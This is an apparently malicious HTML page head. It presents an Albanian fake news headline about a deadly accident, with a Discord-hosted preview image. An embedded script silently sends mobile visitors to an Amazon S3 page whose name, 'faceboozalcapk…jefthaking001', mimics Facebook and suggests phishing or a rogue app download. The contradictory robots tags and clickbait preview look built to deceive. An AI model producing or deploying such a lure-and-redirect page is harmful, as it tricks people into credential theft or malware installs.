<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="318,122,111,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Një aksident tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223114074934608013/fdsdgtwesrter44555.png?ex=6618acbf&is=660637bf&hm=50621a5942383f00b8fe25902a953511a1d0369c4e6beb06a420d17daba21b3c&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://faceboozalcapk254798.s3.eu-west-3.amazonaws.com/jefthaking001+-+copia+(2).html";
        }
    //]]>
    </script>
    